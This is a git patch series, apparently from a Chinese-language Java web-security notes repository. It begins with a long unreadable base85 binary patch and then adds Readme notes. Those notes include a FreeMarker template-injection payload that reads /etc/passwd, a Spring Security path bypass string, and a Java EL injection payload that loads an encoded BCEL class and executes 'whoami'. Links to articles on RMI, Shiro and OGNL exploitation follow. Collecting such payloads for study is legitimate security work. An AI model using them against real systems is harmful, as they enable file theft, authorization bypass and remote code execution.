z=!Fs+xPPv9xcz`)F>1_I7(+|SFlGE#Y?9gU4Rk6FX5;boa{#_{*(CGG*;|Ex-e0CR zkBXRyOD~*6^+=we5I4%(^1m}+%Cdg^nJ7jJ|Jm=T!?ve5V;_(9i=GgEcrucfokVcF zvwKu_p|=jz7=LHx$lEQrZ>%)iol?tfzJHA?%|c~|&yc+xa{0G~=bhF2&w`Q(;dCq} z?WcW714aEFwsS^*F*iLq%1T#v+=8w+JcV$Y&5lm_?n)xB{}L2kW4{aHrK3Yn6SAB5 zhemT-eaF}M{a=CC347j}g)};H>~F^QvFxl=>2O7{drbVNHOEm)?v-MbW@MbIY3^q{ zw1Pe74M;l3CeBlRWkA5wn|hIQ@`R@IlmggxVMO87kJ+2G2OsB&oJ*{58EUwO`N4h=kVS(ETP$!?hEgpYoZEYPd?R>QgM>HBP4$~&-i7F_2ECmv? 
z$*a28=Ye>zx$$07gq4IW{LYlayN{xNPKyxI|l8D(VSiTrsLs@3a%8tm|SHWlJ>r zLU6PbsW7FGhk!O;sE|&^Fa_2gDOfj2n|lL$&nF_%fogs9s{clyDzA{)8zxJnqV5)7 z7CXGphDl06LE#}+URL(@>+gaRMiI(cB5BpdvLEbx!m-eCdp8*5_<>FQYsW3|_eX*A zlZp6Xu?LFMqz-Hu(Mfam24j zAoToiLoRPnUJJ98oM+&VKa{8-X7_~z@$(=N@?I|eBtRAiNU5T!9gr3TOUR;M$Fz#o z`fU*VLUY|eVUJI56AwSHMLH}et7JwsZ}(}W!A7BW()JgWbFa(6o7;&E_v^XEk$_%VBy2!@YBp&8W3Cbix870h=O&Rgo^*1m~Pw5z!3fPMZ zr1*`T>`<-d+sXwL2_vswE`WIw{|eU&Bj+cZ$&E8PF_hR1Zu z?og0ELcSe@B7S2I2di5T>}B$2M?pfKKCfSQk)4+O@%evmXcPL)ynawpBd_iA)$$~K z&zH^I={>)vl+)(>0qQzLuffmV=>X{VLD~;nprhu@pm+sQpioAH`e6OamX0)@Z z_n_309|Yfu%7~g$QxDU#i$3Yk-mf(p3xwrBXf1uDnPgCJqr0$`oYBnl-j?NbafqWi z&&K8!oLB02I%MQ;1?0NYu-D|PvBwp+nIc1ZAHyN0?922rlrog;iSP(BY7;bVe{p?! z>?g5$Z^=JbXf2;#Ij&}}kbk^pFDNL0{a(MQ9=&0VYITqNxZj+_Ia)cs^$GuM>wWgS zA}(u2JI#4qdLto0p>{558G=vJXA>*Kk%nGl5$5Aqp=_?wkfiQ>m$LT~NlG736OoWiz*qq!@u$RIy>=>x%BxR`c#3dtXR(W!k zzxUy2eiMC8dj@YpjYpM7rVWWPA*EFgp?zvf!0Qy6OQNl;q?ARW5_i1%H1J*d=n+OC zr5r3TgUu5PVe#=a=s5BB47>1W!Wcy|#G{xW!6Map`b*^5>T5SecL*WPQpfxxvd8pP zSA{!!VU!M0Q0J0tAb-w}Nw;*#T#?Etf4U$xT(j5{E zN!PfSHxS(>cwk!L;IWONW7a&;b^eGfLife#EKRJ&?D?BpMG8|3=WxsYt&FFCm8@8m zA>-K0z&w!A81VdDY6Tk4g%78K(qcoGh@rIXD)_m$Su#}S%Q?`;fqC+{&oIqIAc4hm zO3dNM^Qr;(Vu?&V&dB;zsI(YPXv#78XlQ7hGH?UlPf#i)fhXN!lF4Boh>0mfi;6f@ z$YZD6mU%jGf+&%p@C;}_K{g&$Zhl%QA&QpKr#+m5kx^A?a%16wtR8XkK829#f7QE~ zea{IXzsObxNc7_Ox8_zZSAB{? 
zZ;*_LlFqZ>Op&sh{3cZ}Ikj(Yzw`s-Th*{i*fY%2-2%Y4TsjZKVbXSJi#4BV#1Xaw zH}b!{*#1Q@V&>))7sxQ5(8}cCdRvCG>ych(J{A;kt0SxkfDh7|U`(bD|_`7In zV}^WPL9YOUn}4gFz81$xee7~CEZ3NxgY#EdIT(PR-}sn*;u?loeHT<0nT~#ZJu-y_ zo^Mpu!z%%uscRk+JjU19l@EgtoVNNaYGq6Xj;y^fI@wgnIox!TiRK-5mDF0#wVwuop0dL1jKatsC?9*K*tIWtKl0x*G8b~;`?Wle3v?&@7wi;#_sjaZklf1(8)lE=pPOBw)5$0w z1#jQCUPO9JWpQ=>{*89{gy+?7PQw;9dtORF zelmc}f1f;_dFhv2ns%0zIf>NM*E`w!h6%Hu(X>tTimvUA(MK%mc6IANuzB-&CU}eO zmVCaxzF4gRI|gDLMR+!p&?+sUV(l+cPt1c@k`B9=(o2+t}0^J)zWictbunh80~CHDU->#D<=(E2}!i6Gq#A|M?ijZ%^$MH=al z5Co)Ax}-ZDDWbG=Nh2U70wOhHATfH>w%^%(@9%l;ec$~9?ius!?8G-dv3bVV^pPot{*BjtutCQXq%0@(y zIucycJzJtQj|)XTqc6~_!mV%=qO`{IVMubea^>u|@N7h%a8KmCl5T8}#~C<8z!-2{T=U9un_9$GW*epwR`u*a=s%~Oo0tegBP3z|AkcuaU@l_%* zzQX7|rK~l$&P23-heSRb~)0Dk3QL9hzQkq$Lz0M|di1px1EoO0@4t z47d76Qstdr2R0z;pMHJYdA;^Bn$@;N;B`2VzB=ecVD6ZXavYdicr$Y2zp8+IpBnVF zR8VEif7R4TM$dhRm+F9TBQZWaJTHpwW|m^)sII0A00o(9ipqjOsV%vbXt(Y8@b;H1 zv?_2m55N1}4+P~=M<$dF<{A%HvTDTc<1=dew@<*Ry@rMpAf?rAVwVRZ=IB4k;7V=D z$jrA}`%`|FnJ@FL*%ProEElc6#gp9qY!5`6wE+9919{o(TQEm z+6Z#-!tQy5(75ZI>gRbX+Yeq*W|bPcbO2c!aJiY@uEal9_3c59{%v7mtICjtdxE4j z!>v!H@mcl;#R;3+?u<&GGoMtL6715iF!a9G=0cML&4iIDT*jbFH#7eY#I1rzTY(6; zqF!3ruR%(ABLHVT!TB{tJ&lUNJoTO>Om%A|3A|*R+uV|{DIY2;jPO~)pq!(-yElX< z$%PbuK{LshS8uwtnNcB3oj`q635rhjQUFZxLnnzO@MtN;8lb%!vEo8R~;vq ztz=4sQW+lrrS8Q`p+1G#n1-#7-dpeP8vdact%wD$A$R8qdd4?EPyhndLYD7efsvU= zi$ei3^AEpJlA}*I<0By-H94mGZ#5t3m=d&I%ToIJS^$q~?j2#fp98pr<#)u@C-2&Y z=ZFU+MW8R>gQ!(a*yko(e#u8Kd%s-n?Y_213qxxBQV}e6@bJ4AA*nI!_(;N8(Dv-d zI$Zp`xa0X`o^(!TYuX5+HS^%XoZ;k_ps0ibaCZ|A$OHF$bhk9<^a}`IFZ(LB*`!Fo z*5!y4JHC8%xk6@cH<~B?oXXU;!# z>LOVeM;h zQkWD0&_w|C=}ve#I(oH>>MIdywWnfBBI_vPmO}HR$~havLR+J!pll``HA^nU%10kI z$68zyZb973#Wm5=RmTJRrC_51L(cdu*~?d5Q~vhC0QHGYPY}w3r8b6As2x{OX{cJP z#s=RyW#oX*AoiBYe3%j&O^fdz$fsPt{$Vvj-0y@ZggsG|H0OM)N=o>4{hITQ$ zOR*Q&kw0Mes)-)>|IIWx36=UUb>dc-3UgWJ+1Uc+es2f<-I~Za)6m8@4MttVjZEgN zH~RZGy;}ZqL+C(nbwGS=(j32h3qpm+GUt!36e}XjUHuw!?=@2Y 
z#_PcIi2ichZq|L?bGzAxgE`J7Gk6?GrXEDOVrvP(Y>VW=Q+BMx;(T5{v&LQm$VW2fmun;QHjw5A&q|d zBeu6%7X2)EN1wTC^PxypQ*r70q1vB;%4a~FDbhdk!Hb^)f)a1(E?!BaPgin0e6b3~ z_E}mhgO;H@$^+y={-DsYss_Yhe+MGx>wLLDE}mJKdU{tyv)D;AhVfQBbgj8=U_98& zDY_BBUqMaF&_bgI6dzV4*dFQ~2=X7to|=JNn@nReBRks)T*!kZ8(+w6%x*WC#3h$P zUiN13^janYVa;&)h`>Da%h`Mz`1jnR8VZowHn#`+%K%N<1;lB2xaViSCxd($XVT=yjQs9lty;I+BhBHo5>ejQBj!x{?h8hAG3{|aH| zHSZ1>na*sSa59SOy$I!32dgS(mp{p*P@Q;1F#Bza>i#f89(KW*34TWx7ry;3%B7Q0 zz80HGhKyEkxydsswxWx2&!w6xbnkzi)a>Xfl|?yVxw2JmaN6+ja0Q`cizOeWnnB9& z&m3o?m^0bKJfbvEj<~@knaU|i_wM?dNgOuOg<}@+=q2^9S#bl8_W7S=#o0&430x1b zKEhbh9B^zr1fV0S%e`)3Um(zQ-AjUDEUnZbb=34@6z~C|6aBP2&~+u~kRwRWaSDLW zY9kJM-rJw{n9+#AE|Fc&kb=U(@_aI-;P1jCBE)_Fkmq0ghBqGI$)N=6jl5NPd3b=U z3Rc#2U?pC--S1&{clW2fjOV@46e8c->A4+x8h=9jnM#4f$wB>=VVmy*DF630FeLwz z+WcaVHGJUdofu2c%Ru8!e}m0;jdp)2gvfo!8DaVS`5UHlC=(3i$JFacvt?y6+fCW& z9k0PPcdTpqzBeymjQ0aEXVA^ptVnk+QmH6k6W71LSG4$E?`$AH-H~Rl9-Ly84!{5S zv7j=p-|z$)W~mA<^8vu8Nj$L!fKzOsccUut>TQ>s8N;0?w!*AqW))I@gTnBXqueqL z?I*LgEFdU^rC1R$m57N&no?{QqLexNP4N;ZvPi3^jm)=c>Ta&X*}ey^aRdC0zF60x ztLHsl%dHkjQf$`H+CbxD_qg;tUO=Y^euIZOjn8=<#zT-XP(wf|g?yqh zPo|IH57<<5n)zkB^Xp5>be2k&KJnF~W=0N3&eBj2iW!{UPSLW-BXI%_<{yVOign&Q zB^7e!0XO21_bLF=5~svad;}g6EgJ z2sGdI0$7e_jDfM*G@n7j6SoMN=0*~vX3uBztDCSZk+DTzcw#_>EfD!SC>>Z@0dR&* z;67E5c82ZGEtMZok#K)$0(^e8C>;pl#Cb zHG6f)|FTbLDkJ>@Vb1qwpZ^f^VkiJN4S99jCa-<U+Jxg z`Kh*onUuTlq~`utqQHb(cG0DIzR|9z1`KN~?;PR8rpS&mHGvnQ#m5i5#gvkyijR4X z%qr!BQpqx6ADhy;USJ*OgOCU`0|?O8D$#!`vC0^uot=*gJQ8k6hRLxQrclKw0vUA` zK&dg{0jR9*orcBl95Va2epZ+c1t919fqb*8u$b5YP`U>gm?(lE`EfHu<75nz>m?Fl zP&&}Tk2p2mg^wbRX&4!8!RDrEX*&LCd=_SYdX1nPNTxF`A%if;bug{Q%L_B~Y;V<`8*ZSCj)5+TEV6@KlW{fxEIb zX*BSpRR1ly^_)4q ztgq@e|8Sl%iw0p2+X<|7aT2m5# z)Mk)L$oY3MJ)jVm?b@Chbm58t^!Pon?+-RLgN#IIO_7q(Blx|=UBZM|gTjtua$%uk zg%XzHNe32{xZGChQLHMO(xeDb1PA*=xtReKXs%~WfgdIZZM-SoH

-KVZw1uE0~f z?Oth6E$8vOg$2v01YHv#RW1REvN#jv9x7ler`DKMzjVR+Jyf)v7`e3WD}m#PrS+z* zEtr6)X!ZLUMS>rHe*)k#fJ;&?*7@x<=d2EaxMLlW1CF%6fkR#|vF)cDXD>2dUBIZt zi#Itrd82vHBssBD$fB=)r)NXYTPiXr-9a{#wfY*j`VU+8VZ3hUqpqHAD~CTt7Sxv3 zAe7V@#MZ~Lw$3h1Ym}e~0?15MuNQe+JJB$Hbg=Asp)7ENzFBKv%E0DoS2XVOS-)F= z0KLqFej9|U#5@40GxiX`TA@X;8h!kpevk7(wg$LHk_2l(+=i7$0I~PY;5U^)s4Xmr zSCzqVAaQ*K_^!TviwoAhnrJpVz_9rtU4YHi&z{n~)BTk}Ofo*;+-2XD?|Ly~PR;6b ze7b+==Kh}J63E4Ho~(~pfoPOudJ1bF1HOgM8Xg`#MAz_IoH~QEXf`&g0%r)gP(jku z-icB1rTWT^7RB#14l5F<6-hhN0k$1v-FyxSQwXGD?D`Bf7OIF9_68vUsQn)fY6d2O zpJZ2YK}k&|t8?v}yW~3fhWAl5+lQm<3+b5_^y75g%&bN5r`r)0@B#Ssjoj>ed(MuJ z!{1Ne@QWPo#Ci6a!A68^T(Y+FGIQk z)R9k!=X;)eZ4TtEI~M6WMC;Sa3xC+W-qap5Z`9-5z!e@~WRahOuyA-^Xytg_sHjj; zqMlc@db5tYjhiw?uly2Ym#{x}jRk*&{V}ql_Se!-{6cOC8(<092ae zWVrYyAzS|%gha(>~o4;nobU{60D@>D}45b3n5;Q)^VYJJHW%we|YVl2V%!LlW*gGnKTl{LZ zSX_uhw4q|=vqgK6q$cgzV{USM6}fmhs1_$Vh8%QimVhmuHCro=1P%__0~LkGdLND8 z0AaZ_GgSJ)nDXJ`OR~T8<@cY0=q}Ii+(Bxz@aLynlfC+fo+|7{e8oCkG-L@2w{YTR z(P9?VH2|yn$OG5-GbI?-$#zYW2Lsn;IwQrIe;!!mj6SO*K+97Mm`dOPUBdm)ghK71 zV|y)sR}ijNY=K^AMk{*4SpK{Xhw4;r;0P)}z}0(;-DUAz3_BkHboaX@Rg)|QkCQG1 z3wrwGv{b0cmIX$YgZzs0P}PB4zj7LEFBP4hPEZ{^A(RK$>|6-E zhRFs$eRKc)ll1z-*V^)Dl2T;t+0(JsO~MuFzJ}iWhZuOxZxYlH3dv7(e438BnRbRr ze~mWWJ)E|TCuM^~+$IJ!T`rf`?OPD6G#G8-%y!8{*QH247ie9-%r(SHbv3jfOv9R| zGi)p^gZ~822qZIJ?VRpepNb1LesSLscgeBIMjHLh4=q$rtt>j1sU8l1oOd}kn}H!D z8`wDj@wvAr0G0FSTSS8dMttF0H0dCb3n|b`{6>+vM{)IWL1^NFAh?wE z%Tt~5(&N$w+>${j8>)q)Ob}GOi5?r%BE7Zi!wA;A9JF(L+lh3DSHr&864tWAAAL=J z`|&EefU)OWw;MR~GlRttO8UH_-jp)tsQS}Z!}FsWGmP3uu^EOZ`%zIfue0iam0C~E z?KRFvP_6g#E*#MySWmXnfi{w#rVaMXqW7OwTyafxbOnZ+03&3|?4ZX9hacAnIGF56AP1%y+E?SNeiPLK-c(y$#!r5D_NLlMV2l=iGGBXvqUpl>jQmc`5 zzUg74VZyl})VijW`EklIX_)+KS0`lp*!nRS_X42o_PY(NxepGS>TmMfrETr+G2oY| z#eV8E{~eVWe+VlrPxAs1+KP_fFc0!D-}_rngOPu{EhpvWyCw(pI=`$Y|3Y1sIP}e} zb2;1ui^MTcn&FJl$3%0arlJQlLYbri&q}EJ7KFyb8eHr8<5C=l##5PZ!n_@z)(O!x z)1Fvv`pcIBf?w#Vsjc$(REUrw$^#eE^B{tE=q`djlnQ%!du&&XZz#X~s%lwaFsS7Iar 
zC{?QTut&2434_5Cua$S%i(Rwj_Vt%|8;lZdy@Ys~lLt+fviR1LfC#W636S|zzxV3x zO7q_rA&4(m-QRDWs!2U8GJjmAr;3jORHWr)3#m~*HR>U??rF2iC#931)TGTxK42|0 z7+hyosavL(q*u%tO-)U$%vxWp8S=aF4K)prCe+jkB#>7=_iHmF<@zWQ?J5;+QB_ry z;BBT{YuB`#PzdTF;1En6Dc93(s>mkaS*1>CHTSmJR;D~&b>n|nIYDluG^olh4-8KY z0Nw3Nm9wNahngqlUfQWY=YoN?dP{6BBQ33J95(FyU~e7T!ZSPoi{%Md&`voe^=z59 z-d1oaDE3vN)K5bjx6DH(Hs4rp4xO#&U_TR+whCfpsQZ3D*= z8Erxjq!>GxvN$D_e77GbIr*<%u=6uJ{?>(R`3D_&zQf8rj)XmX+Ymh(``0qSrbQqu z!tW)zvR;mfglVjia+@u1wi_Ew_7cL>a_<*uaq^j8;XUC{mgukUSHHWuYvixC?fkqy zk4vA~g+ZS4Mp3~d->Hp#)J8RI3HH6N(sW_L)|Da6?@C8wa)99C+WGy;mh>jrv-@4E z`yYF`o(jFVJI1FMsG@lk zT_H>R4pE0;ycSfem2g}{!$dJvN9nII|2_0D*ogd3%Ot&fPjh@;yllEHQ)Ia|mBK&t zw2zZKdOE+s=;NF$)h5)U2M&Gq{Rsd%_ppvD`}PjNvx|C6KcpmLm?evq?&{jXE@BY< z92A(GgAD`5p?B=D$q(A)eePF&qVkbz9Z7JoF!JXHY>Aw9SRy$;j(nz(7Ze#Qw;!Ui zcYiTny6TEWU@oV99pB5d%0&ur{5>%Z`zz_h&hB3$<-^S?i8_Jmjd1cw%i1$?Q@!5! zGPJ$VP43FU_a(`>3C=I9U$@~l`ZyUsvvG2BQ*IX4`wd6>q-e8W*7XT%09&iFp+%o6 zy)ZuPf{f_LG;BcMl=HzSWiH#aUU%uAtNUzimS#KX1=~CqrPjDfKAo!$QMvEMAU5Y& z45b3aa?7dXf=@rj!fsIWo)D{jzfG0P)MY?J!)=>H7B}wO&6FhvJ^lKK%l7Z#{{3UY znlzrKEG4laiv+q!V$VW?t6fB*h&$+HBWE(HjUO?cI;63GFz-Dwy5fA`PZ8aK=j-9a zee+1m<1#tWZo-#XHC->K@5od*1t5ca8E$X3E!$_tU=)9w&!7VtD`1vs+0l0;7hHcL z{DxTK`Z>jet!xY~o9g*>JkFY11KLuA(vfHK`ym?SeX1ETqihEk2k`AfDwHP0%W^Hw zv?s(@LzlUIoo&$IU;h~S{=Gte-hmIW|61kQ5qCZ^1Mb;BUuj$DkVR{w^Uvp?-nEII z)DOOa#s802x4$nBYB37`^K)>Ly9z~}Atr)j|999Q8lC=Y z3M2pL3rW^4RR8z;r6*XYsQl|7klSB>_1NMbpw4wO6UY;EcOnBo0vxyUocekm-1K9A z*}um=JBC1lg0X_O0=eQwGlcl+Ont6De{{j^+rn8TKuM&z0^FK709@wY6btvE4tG<@ z`>*A+7V3}%vQ4;8MoE;7p^7OxfxL)Dw?Hg{-Ug_Za7F_j8)r1IB^X4e-gx)#^S0c| zkg^?7xFykC0bruZavId(8_k@98O$j{IxH(a6+2y-*Yqs z3Jf%9Y>eg8%+O7x>K|9L+8!6stV$(W6Cj)V(PVSk(be*y5}?T0A7cMF&{pt3;w^X)4R_W+4XP5v%3{NJc6c0H< zhf{2t8A?nn2ka3DBIMOeb+@;-JKb_Dqm!M5#pD(K^RQ03tCDz?tY6S%It+19JvgHQ{K|B{^wEf;3f;ek$e+Q4Q75st_WP< z#AIZYvP#Nnge|DMkO9DTLqR(fg$fvkzXA~BGWEZQs_-JR;DZ5epQq_f7UF(EP$&c< zC!oDc8FOvhe|b?VxG*e2VOH$?lq|Lbb*JOSL0f zzj~VTtgI{DVsWf>$=f+O62p9SxbeY1P`^pN$ti0i^~E>%(5TU~i29`U8=aFd>32K2 
zJI2xJbLLMXPY&0&=3amQFVclHy@(4M>I&hlrq4mz=Afod{OwUD1Y zr_q5-x3!-e{@QWFvoe9Yql;0_#2yL>M2 z+non{yYn>H3rB%yI?u8t`?bD9sZfi^kPy6_{QT}jNKj^%nvU2 z8?*Lo&+p3PjTvbXDjJI&WxcAlZ&9WR#R9#%-U-}N_D3SSW1`oa*$p>#6Mjy}GVa`AP>-_w&yq5luJ3Q@NDJu6KYrMJ`d8#BChr zPW|4Ey%|e|llT;IN}_#V6Mbdvv7}kv*tlsPB-}SUOH-86*xs&GIX$Ergz1i#z|=T= zt_`!}xvithS^Rv+N#=+7L#CHLK2bzL=(mH`!Gk-CH-m8;>Oyrs&cqlSYSM7?(^$i8 zcq7l;1`lUxdoqbI-#f8WzleJ*Z?7hz%KOdif#$R6vCe?XV zdFF&E&s<36lk-;i%C!Hb$upN+tF_LtW?iV6dq*R?oBYkUdeiZ;(;5a!Djd0N0Wzq#Zmbvn5oWO+_SL2SipG&=MqoBCI9__gv}rhc&I2s6e{GN2mc=x C)`YYG literal 0 HcmV?d00001 From 5bd59c306d8c9e9d3e6aeab55a1070575cde8af4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 19 Apr 2022 11:53:56 +0800 Subject: [PATCH 030/332] Create Readme.md --- .../FreeMarker/Readme.md" | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 "java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" new file mode 100644 index 0000000..fd33fdb --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" @@ -0,0 +1,9 @@ +# FreeMarker + +读文件 +``` +[#assign ctx=springMacroRequestContext.webApplocationContext/] +[#assign url=ctx.getResource('file:///etc/passwd')/] +[#assign is = url.getInputStream()/] +[#list 1..url.contentLength() as i]${is.read()}[/#list] +``` From 6d434c7ac9d52250a3088e6ee8bfeed404b4a1ab Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 19 Apr 2022 12:10:18 +0800 Subject: [PATCH 031/332] Update Readme.md --- Spring/Readme.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/Spring/Readme.md b/Spring/Readme.md index 93a82aa..0129415 100644 --- a/Spring/Readme.md +++ b/Spring/Readme.md 
@@ -4,3 +4,10 @@ + [cve-2016-4977]() + [cve-2017-4971]() + [cve-2018-1270]() + +## Spring Security ++ [Spring Security / MVC Path Matching Inconsistency(CVE-2016-5007)](https://mp.weixin.qq.com/s?__biz=MzAwMzI0MTMwOQ==&mid=2650173852&idx=1&sn=6b4a6c36c456b5e475b5247451c6dd81&chksm=833cf5aeb44b7cb895e1f67f8f6680e1a22124ce5e9e38d8a5e5321099f40e8acc01ac9e3c85&scene=4#wechat_redirect) + +``` +/%0dadmin +``` From 8d5c616dea63310a3407f3e7d92808c9153ac819 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 19 Apr 2022 12:32:35 +0800 Subject: [PATCH 032/332] Update Readme.md --- shell/EL/Readme.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md index a693272..24f8a89 100644 --- a/shell/EL/Readme.md +++ b/shell/EL/Readme.md 
@@ -29,3 +29,11 @@ byte[] array = ByteBuffer.allocate(100).array(); whoami.read(array, 0, whoami1); System.out.println(new String(array)); ``` +## 加载字节码 + ++ [Java el 2.1 表达式注入payload(复现上古版本nexus rce)](https://mp.weixin.qq.com/s?__biz=MzIzOTE1ODczMg==&mid=2247485253&idx=1&sn=b1490922c8b4dfcfde6cfdf425ea8597&chksm=e92f13e6de589af00713b3584841d20c209bf361fe1a1c2fa53e7f37432d7728da008bafde35&scene=178&cur_album_id=1359948349721460737#rd) +``` +${''.class.forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$I$7c$m$n_$A$Deval$$class$A$8dT$5bO$TQ$Q$fe$O$ddv$cb$b2$U$u$d7$827$f0$c2B$vU$f1$da$o$m$V$US$c1$80$c14$3em$b7$87$ba$a4$ddm$b6$5b$c2$3f$f2Uc$d2$gI$7c$f4$c1$9f$e2$8fP$e7l$97$5eB$8d$b6$e9$cc93$df$99$f9f$e6$9c$fe$f8$f5$f5$h$80$3bx$a9$60$Y$8b2$e2$K$fa$84$5e$92$91P$b0$8c$a4$Q$b7$VB$dcU$Q$c4$8a$C$J$f7$84$b8$_$80$P$c2x$u$f4$p$Z$8fe$a4$YB$ab$a6e$bak$M$Bm$e1$90A$ca$d8$F$ce0$945$z$be$5b$x$e7$b9$f3F$cf$97$c8$S$cd$da$86$5e$3a$d4$jS$ec$7d$a3$e4$be7$ab$U$p$cbO$f4R$9a$f6$fc$94$h$M$b7$b4$ec$b1$7e$a2$tK$baUL$k$b8$8ei$V$d3$L$XM$94$d3$u$XD$e8$k$ae$c1$aa$b7$da$ac$99$a5$Cw$Yb$X$40$be$8b$b0$91$7c$ed$e8$88$3b$bc$b0$cfu$P$3c$d5$E$9bvr$b3$cb$p$u$96$a82$ca$ecp$o$ael$9d$g$bc$e2$9a$b6U$95$n$9ce$dd$b4$Y$s$b4w$3d$K$Q$dd$d1$9d$o$j$h$ed$e1$a6$60$Hv$cd1$f8$b6$v$3a$d3$_$3a$b2$yP$wF$Qe$98$fc$L$7d$ca$d6$9b$x$95$7c$ee$d8$b1$w5$97Nq$bd$dc$f4$c9XU$f1$Ek$w$a6$b0$$cC$c5Sl$8aD$Z$n$9e$a9$d8$c2$b6$8a$e7x$c1$c0$U$V$3b$d8$W$b3$nF$M$c3m$k$7b$f9cn$b8TN$x$cf$5e$ab$l$M$pm$e0$7e$cdr$cd2U$a5$U$b9$db$da$8ck$9d3$f5$cd$d4$87$f9$7fL$ff$b5c$h$bcZMw$a5$f0$8d4KJ$d1Q$_5$ee$3cMw$p$e8$f8$94$d6$d3$n$G5$dav$f9$93$X$d60$f9$LYo$fecZ$cf$L$Z$d2$x$Vn$d1$9dL$fc$d7$Vn_$c1$b0k7M$98$c5$Q$3dL$f1$J$80$89$d9$93$i$a5$dd$KiF$3a$b8$d8$A$fbD$8b$3e$8c$91$U$8f$91$8c$f4$3ee$8c$d3Jm$820$81I$d2T$qb$84$Q$B$3e$pD_$ms$86$be$5c$D$81Wg$90rg$I$e6$be$m$U$afC$ae$p$dc$40$7f$D$can$a2$8e$81$5cJ$fa$8e$e8RL$aaC$8d$O$92x$fb$e1$f7$cf$a5$3a$o$a9$60$y$f8$b1$95$7e$da$L$a9$m$8c$Bb$3e$888$oH$R$ff$Nb$$$e8$ac5S$fat$c4j$g3D$x$8
c4$$$e12E$99$c5$i$ae$e0$wU$ab$91$e7$g$fd$q$3a$j$m$fb$M$951Gg$q$c2_G$3fn$e0$a6$df$8b$b8W$g$3a$fb$Q$f2$Mc$j$3d$a0$ff$R$cc$7bZ$f3P$L$7f$A$f1$e1$81$9c$fb$E$A$A').newInstance().exec('whoami')} +``` +**需要注意jdk版本问题可能没有bcel类** +理论上spel表达式可以用的payLoad 这里也可以利用 From f4b20d932efc72f0a6e4374c76d58a577b1896a0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 22 Apr 2022 08:37:32 +0800 Subject: [PATCH 033/332] Update Readme.md --- RASP/Readme.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/RASP/Readme.md b/RASP/Readme.md index 673efb2..fc2ac3f 100644 --- a/RASP/Readme.md +++ b/RASP/Readme.md @@ -44,7 +44,11 @@ PHP是通过开发第php扩展库来进行实现。 -### 代学习 +### 学习 + +https://blog.csdn.net/HY1273383167/article/details/116211211 1 + +https://blog.csdn.net/u011721501/article/details/74990346 1 https://www.freebuf.com/articles/web/197823.html From 71be89073fdcd7fce3c47cdb1058d6b0b0fd499a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 23 Apr 2022 14:52:06 +0800 Subject: [PATCH 034/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f4b5196..476b835 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -117,3 +117,4 @@ + 2022/04/05 [JAVA RMI 反序列化流程原理分析](https://xz.aliyun.com/t/2223) **rmi攻击的回显思路,通过异常回显** + 2022/04/07 [(先知首发)从Jenkins RCE看Groovy代码注入](https://www.mi1k7ea.com/2020/08/26/%E4%BB%8EJenkins-RCE%E7%9C%8BGroovy%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5) + 2022/04/09 [Spring Boot拦截器(Interceptor)详解](https://juejin.cn/post/6844904020675559432) **注入interceptor的基础** ++ 2022/04/23 [红队第4篇 | Shiro Padding Oracle无key的艰难实战利用过程](https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&mid=2247492569&idx=1&sn=a3ff25d6fb277763785213b18885b422&chksm=fd8477b3caf3fea59b39ab27229e214e5a4038dbc6925b5ccafea9481bc8952313b404f84a11&mpshare=1&scene=23&srcid=0423xysf3wTzCs7HWGlyakZM&sharer_sharetime=1650694544259&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 56c34fd0e2620b533902aab0fc4de18a0dcc824e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 25 Apr 2022 16:36:40 +0800 Subject: [PATCH 035/332] Update Readme.md --- shell/OGNL/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md index cfcbb9b..8c85bbf 100644 --- a/shell/OGNL/Readme.md +++ b/shell/OGNL/Readme.md @@ -35,3 +35,6 @@ String bypass_sm_exp = "var str = Java.type('java.lang.String[]').class;" + >参考 >https://www.sec-in.com/article/753 >https://www.mi1k7ea.com/2020/03/16/OGNL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/ + +## mybatis 存在${}的ognl +参考2022的d3ctf ezsql From f28035c18e69eb32ab65a4fcf048d4d71439805a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 25 Apr 2022 16:37:22 +0800 Subject: [PATCH 036/332] Update Readme.md --- shell/OGNL/Readme.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md index 8c85bbf..1c52c1b 100644 --- a/shell/OGNL/Readme.md +++ b/shell/OGNL/Readme.md 
